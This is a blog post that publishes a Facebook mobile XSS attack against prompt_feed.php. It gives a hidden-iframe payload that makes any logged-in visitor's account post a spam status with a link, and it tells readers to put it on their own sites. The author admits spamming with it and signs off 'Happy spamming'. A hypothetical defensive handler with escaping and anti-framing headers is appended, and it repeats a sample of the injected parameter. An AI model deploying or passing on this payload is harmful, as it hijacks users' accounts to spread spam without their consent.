Autopost Spamming using Facebook Mobile XSS

Posted by: Joy  :  Category: Facebook Tips, Vulnerability

What has happened out there really pushes me to share this. I call this Autopost Spamming using Facebook Mobile XSS. I don't care anymore if this one gets filtered; the faster they fix it, the better. People don't seem to care how hard I tried to hide this code from the Facebook team. Frankly, I also use this to post spam with a link to this blog, but it only affects Indonesian IPs, with a custom interval. So people outside Indonesia won't be able to see this. Too bad it has now spread like a worm everywhere, wide open without any source code protection.

Never mind, it's no use complaining about what has happened anyway. Let's talk about this in detail. This is about how to make an automatic status update post to people's Facebook profiles. The method uses an XSS vulnerability in prompt_feed.php on m.facebook.com. When people view our page containing this evil code, they automatically post a status update with any message we want.

Below is the iframe HTML source code:

<iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>

Put the code above on your website and change the red code to your own message. Whenever logged-in Facebook users see your page, the message will be posted automatically to their wall.

That’s all. Happy spamming :(
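Seen from the server side, the iframe above relies on three things: the prompt parameter is echoed without encoding, the page can be framed by another site, and the form posts without further checks. The following is an added example, not code from this post or from Facebook: a hypothetical handler for such a prompt page, where the function names, the form path and the assumption that the parameter lands in HTML markup are all illustrative.

```javascript
// Added example: a hypothetical handler, not Facebook's code.
// Assumption: the prompt parameter is echoed into the HTML of the form page.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can end a text node or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Token comparison that does not stop early at the first differing character.
function tokensMatch(expected, submitted) {
  if (typeof expected !== 'string' || typeof submitted !== 'string') return false;
  if (expected.length === 0) return false;
  let diff = expected.length ^ submitted.length;
  for (let i = 0; i < expected.length; i++) {
    diff |= expected.charCodeAt(i) ^ submitted.charCodeAt(i); // NaN counts as 0
  }
  return diff === 0;
}

// Render the prompt page: encoded parameter, no framing, no script execution.
function renderPrompt(query, sessionToken) {
  const prompt = escapeHtml(query.user_message_prompt || '');
  return {
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'X-Frame-Options': 'DENY', // refuse to load inside another site's iframe
      'Content-Security-Policy': "frame-ancestors 'none'; script-src 'none'",
    },
    body:
      '<form method="post" action="/feed/publish">' + // hypothetical path
      `<p>${prompt}</p>` +
      `<input type="hidden" name="csrf" value="${escapeHtml(sessionToken)}">` +
      '<textarea name="message"></textarea><input type="submit" value="Post">' +
      '</form>',
  };
}

// The token alone would not stop this bug: injected script runs in the same
// origin and submits the form, token included. Output encoding is the fix.
function acceptPost(sessionToken, form) {
  return tokensMatch(sessionToken, form.csrf) && typeof form.message === 'string';
}

// Constructed sample with the same shape as the parameter in the iframe above.
const SAMPLE_PARAM = "'<script>document.forms[0].submit()</script>";
```
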


31 Responses to “Autopost Spamming using Facebook Mobile XSS”


  1. 31
    emailblog Says:

    Yes, this code is not working any more. Waiting for a new one.
